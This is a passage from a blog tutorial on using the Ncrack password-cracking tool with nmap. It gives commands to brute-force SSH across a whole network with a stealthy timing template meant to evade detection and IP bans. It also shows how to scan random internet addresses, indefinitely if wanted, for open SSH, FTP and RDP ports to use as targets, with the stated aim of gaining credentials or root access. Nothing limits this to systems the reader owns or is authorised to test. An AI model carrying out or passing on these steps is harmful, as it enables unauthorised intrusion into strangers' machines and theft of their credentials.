</div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Calibri;"><strong>Example:</strong> ncrack -v –T1 –user root ssh://192.168.0.0/24</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This will launch the SSH module against the whole network using the sneaky timing template. This works well for keeping off radars and getting IP bans, but may take considerably longer to run through all of your possibilities.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> Timing levels of T4 & T5 can cause denial of service conditions on some slower services, like RDP and SSH so you may want to do a little research on the ins and outs of each protocol to help you come up with what works best.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">At this point you have most of the available options to run Ncrack since it has a decent number of username and password lists included with it by default; all can be found in the “/install/path/ncrack/lists/“directory. If you want to use your own custom username list or password list you can do that too. Here are the available options to choose from, depending on how you want to set things up:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“-U” will define a single username to attack</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--user /path/to/userfile.txt” will define the path to the file of usernames to use for attacks</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“-P /path/to/passfile.txt” will define the path to the file of passwords to use for attacks</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--pass password1,password2,password3” allows you to use comma separated password list as defined on command line by user</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--passwords-first” will instruct NCRACK to try all possible passwords for each username before moving on to the next username, whereas by default it tries each username to password before moving to next password. This is helpful if you are 100% sure you know the username you are attacking as opposed to bruteforcing both user and pass combinations (like if you dumped a database and are checking credentials on known systems)</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, that covers the basics, here are a few world examples of how I would go about it on Linux, as well as a nice short video I put together of the whole thing in action:</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 1:<span style="mso-spacerun: yes;"> </span>Find open SSH,FTP,RDP ports to target using your favorite scanner (mine is NMAP)…</span></b></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.25in; mso-add-space: auto; mso-list: l4 level1 lfo6; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">nmap -T4 iR <# of target-ip to randomly scan> -sS -p22,2222,21,3389 –oX targets.xml</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 0.25in; mso-add-space: auto;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> If you set the # of targets to zero (0) it will scan indefinitely which can be handy from time to time…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">This will run a NMAP scan for open SSH ports running on default port of 22, or the infamous beginner admin move to port 2222 (silly admins), as well as FTP and RDP services on default ports. It will use reasonable timing methods but not super aggressive, and will use SYN packets to run the discovery. It will also make it easier to identify targets to try with NCRACK by using use the “–oX <filename>” options to send all output to a file which can then be used to feed into NCRACK as I described above, using the “–iX” option. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 2: figure out what modules we want to attack with and what user/pass lists we will use (if any other than default):</span></b></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">What ports did we scan for? It will help determine which modules to use…</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Did we run the scans in a way we can import the results to keep things easier? If so where it located is and what is it called? Helps to know so you can input your command syntax properly…</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Do we want to attack more than one protocol? If so make sure to use the right arguments or create specific scans for each attack you want to run…</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Keep info handy :p</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 3: Run NCRACK and await the results to come back…hopefully with popped credentials that give you access or even better full root access.</span></b></div><div class="MsoListParagraph" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l5 level1 lfo5; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">You can hit enter to get a status update in the terminal while waiting for it to run its course and the “p” will print a list of all the successful credentials found if you want to see mid scan whats been found. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><span style="font-family: "Calibri", "sans-serif"; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">When it is done it will show you the results, and you can then continue as you like from there. I hope you enjoyed this informative tutorial on a great cracking tool made by a great team. It is one you should <span style="font-family: "Calibri", "sans-serif"; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">definitely </span>add to your collection if you don’t have it already. If you never used it before I highly encourage you to try it out. I haven’t had great success with SSH or HTTP myself but it is hands down the fastest for FTP and very good at handling RDP and VNC as well. Below is a little bonus video to show you an example of how it can be used against FTP. I hope you enjoyed this tutorial as much as the others, and I encourage you to check back often to see what else I have covered or come up with. If any questions on anything please just comment or shoot me a note. </span><br />
<br />
<strong><u>VIDEO:</u></strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/krugWwmNeuA?feature=player_embedded' frameborder='0'></iframe></div><br />
<br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt; text-align: center;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Until next time, Enjoy!</span></b></div>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com5